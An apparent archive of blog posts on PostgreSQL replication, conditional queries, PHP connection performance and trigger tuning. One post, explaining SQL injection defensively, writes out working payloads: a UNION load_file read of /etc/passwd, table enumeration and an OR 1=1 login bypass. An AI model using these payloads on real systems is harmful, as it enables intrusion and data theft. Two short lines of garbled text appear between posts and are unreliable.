Archive for the ‘SQL’ Category

One Of PostgreSQL’s Biggest Weaknesses

Sunday, April 13th, 2008

One of PostgreSQL’s biggest weaknesses is easy replication and clustering. Note, that I said easy. There’s absolutely replication solutions for PostgreSQL, but many of them have serious downfalls, and are a serious pain in the ass to setup.

Slony-I is a decent single-master multi-slave solution, if you don’t need LOBs replicated. It’s a little hard to setup, and you have to learn it’s special syntax for the config files you will have to create. A serious pitfall is it is ascynchronous, and therefore doesn’t guarantee all nodes will have the same information at any given time. Writes don’t scale very well. Also, if the master server goes down, you’re pretty much screwed unless you have a really cleaver way of failing over, since:

  • Sequence replication isn’t always reliable.
  • Triggers are disabled on all nodes, except for the master, to make sure they’re not called twice.
  • Incomplete failover results in errors being thrown on all nodes, including the failover master, with writes.

When using Slony-I, you need something like pgpool-II so you can transparently load balance nodes and redirect writes to the master server.

pgpool-II also has a multi-master replication mode, however, it absolutely sucks. The reason? It’s statement based, so instead of doing an insert and copying the result to all other nodes, it runs the same statement on all nodes, resulting in drift on all fields that use default values.

PgCluster seems to fix just about all of the problems with Slony-I and pgpool-II, by providing synchronous multi-master replication, however:

  • It’s basically a patchset to PostgreSQL, so it tends to run a release behind.
  • It’s a major, major, MAJOR, pain in the ass to setup.

Conditional UPDATE And DELETE In PostgreSQL

Friday, April 4th, 2008

One of the coolest PostgreSQL features: Conditional SELECTs/UPDATEs/DELETEs.

Lets say we have a table of distances, but we need to add a column for the distance type, ie, Miles or Kilometers. Conditional UPDATE to the rescue!!!:

UPDATE distances SET measurement =
    (CASE WHEN (name ~* '^[0-9]+K|km.$|kilometers$')
        THEN 'kilometers'
    WHEN (name ~* '^[0-9]+M|mi.$|miles$')
        THEN 'miles'
    ELSE 'unknown' END);

They also work for DELETEs, but I haven’t found any real world situation where it makes a lot of sense. Regardless:

DELETE FROM table WHERE
    (CASE WHEN col1 ~* '^foo|bar$'
        THEN 't'::boolean
    WHEN col2 ~* '^oof|rab$'
        THEN 't'::boolean
    ELSE 'f'::boolean END);

PHP And pg_connect: Post Mortem

Sunday, February 24th, 2008

In my previous post, I tried to find out why a PHP script was so slow. Here’s an update from then.

Basically, pg_connect is slow. There’s probably a lot of PHP overhead to connect to a database plus it probably expects to be opening a fresh connection everytime, as using pooled connections doesn’t seem to speed it up very much (it goes from ~50 requests a second to ~200). Persistent connections seem to be much faster, albeit much slower than connecting to a pool with Python (450 requests a second compared to 1000), however, if you understand the inner workings of persistent connections you will know that using them with PostgreSQL is seriously broken, as a small number of users connecting to different sites on the same server can easily exhaust max_connections. Using pg_pconnect to connect to a connection pool doesn’t work either; it’s like combining the worst of both: the slowness of pg_connect, and the broken-ness of pg_pconnect.

So there’s pretty much no solution to this problem at this point in time, except maybe to port the script to Python.

humongous professional douchebag

PHP Is Slow… Really Slow

Friday, February 22nd, 2008

Lately, I’ve been trying to figure out what’s slowing down a site that’s currently in development… It didn’t take long to figure out what it was.

There’s a script on the server that handles image requests transparently, ie, utilizing mod_rewrite. Basically what it does is this:

  1. Connect to database.
  2. Query the database for the meta info of the requested file (created, modified, filetype, etc).
  3. Check if the client has a cached copy of the image, and if it does, send a 304: Not Modified, an ETag, and return.
  4. If not, grab the file from server-side cache if it exists, send it, and return.
  5. Else, fetch the image from the database, cache it locally on disk, and send the data.

99% of the time, all it does it grab the meta data, and send a 304 Not Modified, yet, it is extremely slow, so I decided to do a quick benchmark of PHP and Python, comparing how fast they deliver a small image (about 10kb) from a PostgreSQL database… The results were shocking.

The setup is very modest, an Athlon 64 3200+, 2GB ram, and a 500GB 7200.10 SATA II hard drive. The test is very simple: connect to the database, of which the connections are pooled by pgpool, fetch and send the image, then close the database connection.

The code used is as followed.

PHP:

// Note it's port 5433. That's the port that pgpool listens on.

$con = pg_connect("dbname=testdb user=testuser host=127.0.0.1"
    . " password=password port=5433");

$res = pg_query("SELECT data, filetype FROM images WHERE id = 1");
$res = pg_fetch_assoc($res);

header('Content-Type: ' . $res['filetype']);
echo pg_unescape_bytea($res['data']);

pg_close($con);

And now Python:

import psycopg2
from mod_python import apache

def handler(req):
    con = psycopg2.connect("dbname='testdb' user='testuser'"
        + " host='127.0.0.1' password='password' port='5433'")
    cur = con.cursor()

    cur.execute("SELECT data, filetype FROM images WHERE id = 1")
    row = cur.fetchone()
    con.close()

    req.content_type = row[1]
    req.write(row[0])
    return apache.OK

Pretty simple, right? I ran the test using ab, or Apache Benchmark, with the command:

ab -c 10 -t 15 http://localhost/<scriptname>

I ran the test three times for each script, here’s the results:

PHP - Maximum Requests/Second: 145.32
Python - Maximum Requests/Second: 1088.64
Apache2 Static Image - Max Requests/Second - 2778.54

WOW! Python is nearly 8 times faster than PHP in this test! I was so intrigued, I decided to dig deeper to see exactly what the bottleneck is in PHP.

I created a new test: Connect to the database, and close the connection immediately, don’t send any data whatsoever.

Here’s the results from that:

PHP - Max Requests/Second: 205.00
Python - Max Requests/Second: 1089.32

So PHP gains ~50 requests/second, and Python has no improvement at all. But what if we just leave the scripts blank? Basically just return and do nothing at all? Here’s the results from that:

PHP - Max Requests/Second: 1566.77
Python - Max Requests/Second: 1819.46

So basically, PHP sucks, at least when it comes to PostgreSQL connections. What’s strange is PHP doesn’t seem to have the same problem with MySQL connections, where by simply connecting to the database, performance drops significantly, so something is certainly wrong with the way PHP handles PostgreSQL. I bet there’s a lot of “MySQL vs. PostgreSQL” benchmarks out there that wield wildly inaccurate results because of this. Actually, if you compare MySQL and PostgreSQL purely in Python, you’ll find that PostgreSQL is quite a bit faster at handling binary data, such as images. I will be back if I find more information or a fix for this behavior.

UPDATE: it looks like the problem lies specifically with the pg_connect function. This problem doesn’t exists with pg_pconnect, however, you cannot connect to a database pool like pgpool/pgbounder with pg_pconnect, as that degrades performance.

Understanding SQL Injection

Wednesday, February 20th, 2008

In order to understand how to protect your application from SQL Injection attacks, it’s a good idea to understand how SQL Injection works.

One big mistake people have is forgetting to turn off debugging. Debugging information is the holy grail for hackers. Not only can they attack your application, but they can also see the internals of your database, and worse! As is the case with mysql, you can actually load files from the server, and workout a plan to compromise the server! Suppose you have a simple login form, with fields “Username” and “Password”. The table might look something like this:

id INTEGER,
username VARCHAR(32),
password VARCHAR(64)

Let’s assume the programmer forgot to quote the password correctly. Now, by manipulating the unquoted field, a hacker can easily craft a query like this:

SELECT * FROM users WHERE username = ‘bob’ AND password = ‘‘ OR 1=1 UNION SELECT null,load_file(’/etc/passwd’),null; — ‘;

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
messagebus:x:103:106::/var/run/dbus:/bin/false
avahi-autoipd:x:104:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:105:111:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
cupsys:x:106:113::/home/cupsys:/bin/false
haldaemon:x:107:114:Hardware abstraction layer,,,:/home/haldaemon:/bin/false
hplip:x:108:7:HPLIP system user,,,:/var/run/hplip:/bin/false
user1:x:109:7:User 1,,,:/home/user1:/bin/bash

As you can see, the result returned all of the users in /etc/passwd. This information can be used to find acceptable user accounts to be brute forced, for instance, user1 has a bash shell and a password, unlike unlike cupsys which can only run commands via sudo since it has no password and no shell. This same method can be used to download binary files, such as to find a vulnerable version of a program.

With other database systems, however, you can’t do this, since MySQL is the only database server that, to my knowledge, supports the load_file function. You can, however, gain access to an application with other database systems, or find more information about the database layout. For instance, using the same vulnerability as before but with PostgreSQL, you can run this instead:

SELECT * FROM users WHERE username = ‘foo’ AND password = ‘‘ OR 1=1 UNION SELECT 0,tablename,null FROM pg_tables WHERE schemaname = ‘public’; —’‘;

id | username | password
—-+———————-+———-
0 | pages |
0 | creditcard_numbers |
0 | users |

That query returns all of the tables in the database, for further manipulation and data theft. What makes this dangerous is databases that hold sensitive information, such as credit card numbers, social security/national ID numbers, addresses, and email accounts.

However, not all applications have debugging turned on, so instead what you can do is first gain access to the site by changing a few things in the above queries, then deface or steal data from the admin panel. This can be done quite easily.

SELECT * FROM users WHERE username = ‘foo’ AND password = ‘‘ OR 1=1 LIMIT 1; — ‘‘;

That query will always return with one row, and thus can allow a hacker to gain access to a site.

One thing to remember is everything has bugs. Whether or not those bugs can be used to create an exploit is up in the air. Always sanitise your input. Cast fields that are supposed to be integers as such (ie. $id = (int)$_GET[’id’]), and most importantly, always escape and quote all input before running a query.

PostgreSQL - Problems With Slow TRIGGERs

Tuesday, January 29th, 2008

There’s seems to be some people complaining about slow TRIGGERs in PostgreSQL, so I thought it might be a good occasion to go over some things that can slow TRIGGERs down.

Avoid using FOR EACH ROW triggers. The real killer I’ve run into is people creating triggers that are FOR EACH ROW, then they have large transaction blocks somewhere in their application. That creates a huge problem, because now you have triggers firing off for every insert you do, and if you’re doing a lot of inserts and your trigger does anything relatively costly, it will kill performance. I’ve seen situations where it takes nearly a minute to run a transaction block for a relatively small number of rows. When you have something like this, see if it’s possible to change your trigger so it runs FOR EACH STATEMENT.

Tune your triggers. If you’re using triggers, chances are they can be optimized. Look for code that can be minimized or things that aren’t needed. Things like selects tend to get overlooked, and you may have one’s that can be optimized, or be merged together. EXPLAIN ANALYZE is a great tool for this.

PHP And pg_pconnect - Persistent Connections Suck

Thursday, January 10th, 2008

Lately, a server I’ve been maintaining has been running out of database connections. Upon further investigation, the culprit is clearly PHP’s pg_pconnect function. Persistent connections with PHP is buggy to say the least, and it’s often mistaken for connection pooling. Connection pooling is different from the persistent connection implementation that PHP uses, since persistent connections are only per Apache process. That means that each Apache process (likely per user), has it’s own pool of connections that only it can use. What’s worse is the connection isn’t closed until the Apache process times out, so most of the open connections are idle. The flaw in this design is astonishing. Right now, there’s 38 open database connections and only two of them are actively being used. Also, by default, PHP has pgsql.max_persistent set to -1, meaning each Apache process is allowed unlimited database connections. If you’re set on using persistent connections over pooling, you should set that to no more than 1 or 2.

The real solution is to use a “middleman” process to provide true connection pooling. This can easily be done easily with pgpool.

This is the pgpool configuration I’m using right now:

listen_addresses = ‘localhost’
port = 5433
socket_dir = ‘/tmp’
backend_host_name = ‘localhost’
backend_port = 5432
backend_socket_dir = ‘/var/run/postgresql’

Now, the only change you have to make to your PHP projects, is to use pg_connect instead of pg_pconnect, and connect to port 5433, instead of 5432. That’s it! Pgpool will automatically pool your database connections, and you will avoid running out of connections!

hmnos ocea
uogu rfsinlduhbg

PostgreSQL Slow Count() Workaround

Wednesday, December 12th, 2007

You may also be interested in this. It’s a far more elegant solution, if you only need the entire number of rows in a table.


MySQL zealots tend to point to PostgreSQL’s slow count() as a weakness, however, in the real world, count() isn’t used very often, and if it’s really needed, most good database systems provide a framework for you to build a workaround. The reason MySQL has fast counts, is because, they’re cached. This works in MySQL because MySQL uses serialized INSERTs, but higher grade DBs are transactional, and PostgreSQL uses MVCC, so caching row counts produces inaccurate results.

Here’s an example count() workaround for PostgreSQL, using a combination of PL/PgSQL and TRIGGERs. You could certainly extend this model, adding more columns to the cached rows table, so you can simulate SELECT count(id) WHERE foo = ‘bar’, although you’d have to add a TRIGGER for UPDATEs.


--- This table will be used as a dummy table,
--- that we wan't to get a count() from.
CREATE TABLE tbl1 (
    id INTEGER
);

--- This table is where the cached counts will be stored
CREATE TABLE tbl1_num_rows (
    num_rows INTEGER NOT NULL
);

--- Function to update the count in tbl1_num_rows,
--- on an INSERT
CREATE OR REPLACE FUNCTION tbl1_up_rows_insert ()
RETURNS TRIGGER AS $$
    DECLARE
        row RECORD;
    BEGIN
        --- Auto-add record
        SELECT INTO row num_rows FROM tbl1_num_rows;
        IF NOT FOUND THEN
            INSERT INTO tbl1_num_rows VALUES (0);
        END IF;

        UPDATE tbl1_num_rows SET num_rows =
		((SELECT num_rows FROM tbl1_num_rows) + 1);

        RETURN NEW;
    END;
$$ LANGUAGE plpgsql;

--- Function to update the count in tbl1_num_rows,
--- on a DELETE
CREATE OR REPLACE FUNCTION tbl1_up_rows_delete ()
RETURNS TRIGGER AS $$
    DECLARE
        row RECORD;
    BEGIN
        --- Auto-add record
        SELECT INTO row num_rows FROM tbl1_num_rows;
        IF NOT FOUND THEN
            INSERT INTO tbl1_num_rows VALUES (0);
        ELSE
            IF row.num_rows > 0 THEN
                UPDATE tbl1_num_rows SET num_rows =
                    ((SELECT num_rows FROM tbl1_num_rows) - 1);
            END IF;
        END IF;

        RETURN NEW;
    END;
$$ LANGUAGE plpgsql;

--- Add the TRIGGERS to tbl1
CREATE TRIGGER tbl1_up_rows_on_insert AFTER INSERT ON tbl1 FOR EACH ROW
EXECUTE PROCEDURE tbl1_up_rows_insert();

CREATE TRIGGER tbl1_up_rows_on_delete AFTER DELETE ON tbl1 FOR EACH ROW
EXECUTE PROCEDURE tbl1_up_rows_delete();